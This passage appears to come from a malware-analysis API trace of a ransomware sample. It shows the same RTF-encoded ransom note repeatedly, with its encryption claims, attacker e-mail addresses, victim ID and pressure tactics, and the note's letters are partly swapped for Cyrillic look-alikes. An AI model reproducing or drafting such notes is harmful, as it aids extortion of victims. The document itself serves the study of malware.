ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0071.056] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0071.056] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will 